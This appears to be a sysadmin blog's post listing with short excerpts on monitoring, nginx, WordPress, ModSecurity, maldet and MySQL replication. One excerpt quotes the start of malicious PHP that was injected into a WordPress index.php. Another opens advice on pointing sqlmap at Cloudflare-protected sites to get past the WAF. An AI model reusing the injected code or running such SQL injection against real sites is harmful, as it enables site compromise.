Ever encountered php unknown code injected at top of your index.php file? I have same issue in my WordPress website where some unknown php scripts was injected at top of index.php file. Below is the sample of that php code: <?php @set_time_limit(3600); @ignore_user_abort(1); $xmlname = ‘mapss271.xml’; $jdir = ”; $smuri_tmp = smrequest_uri(); if($smuri_tmp==”){ $smuri_tmp=’/’; } […]
How to monitor Linux servers in icinga2?
This is third part. Previously, we have installed icinga2 and icingaweb2. Now, we are going to monitor basic services of Linux server. I assume you have followed how to install icinga2 and how to install icingaweb2 post. master server ip: 127.0.0.1 master server hostname: master.server.com client server ip: 0.0.0.0 client server hostname: client.server.com In master […]
How to install icingaweb2 in centos?
This post will show how to install icingaweb2 in centos server. This is second part. First part was about how to install icinga2 in centos server. We are going to install icingaweb2 using mysql, therefore I assume we have already installed mysql. If not, then please install mysql first. Installing the IDO modules for MySQL […]
How to install icinga2 in centos?
This post will show how to install icinga2 in centos linux server to monitor different servers. Icinga 2 is an open source monitoring system which checks the availability of your network resources, notifies users of outages, and generates performance data for reporting. Add Icinga repository RHEL/CentOS 7 # yum install https://packages.icinga.com/epel/icinga-rpm-release-7-latest.noarch.rpm RHEL/CentOS 6 # yum […]
Forward nginx stats in from collectd to influxdb
Requirement Nginx must be compiled with HttpStubStatusModule​ module. You can check that by running following command: nginx -V 2>&1 | grep -o with-http_stub_status_module If you see following output, you are good to go ahead. Otherwise, you have to install nginx with this module. with-http_stub_status_module Nginx Config $ sudo vi /etc/nginx/conf.d/status.conf server { listen 127.0.0.1:80; location […]
WordPress wp-admin/async-upload.php 403 Forbidden
I was trying to upload image from WordPess media and was getting 403 message. I searched and tried every method. Some of them include: disabled modsecurity created alternate uploads folder given 777 permission to uploads folder At last I turned on WP_DEBUG log and got following error: WordPress database error: [Duplicate entry ‘794356’ for key […]
Bypass Cloudflare protected sites with sqlmap
When you suspect your target site is vulnerable to SQLi and you find out that it is protected by Cloudflare, you can still to launch SQLMap against the target. First of all, you need to make sure the target site is protected by Cloudflare, you can add “–identify-waf” to confirm. However, do not set “–thread=” […]
Failed to access DBM file “/var/cpanel/secdatadir/ip”: Permission denied
If you have applied modsecurity rules either from OWASP or COMODO, you may see below error in /usr/local/apache/logs/error_log: Failed to access DBM file “/var/cpanel/secdatadir/ip”: Permission denied This is because you are using apache chroot jailed vhosts and mod_ruid2. To make it accessible you may have to change secdatadir to /var/log and give appropriate permission to […]
Optimize malware detect (maldet)
Linux Malware Detect (LMD) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. more at: https://www.rfxn.com/projects/linux-malware-detect […]
Mysql replication in centos7
We are going to sync all mysql database in centos7 and exclude some database. We only need mention which database we do not want to sync, by default all other databases will be on sync. In master server Backup your current mysql config file and insert following under [mysqld] section # cp -p /etc/my.cnf /etc/my.cnf_ORG […]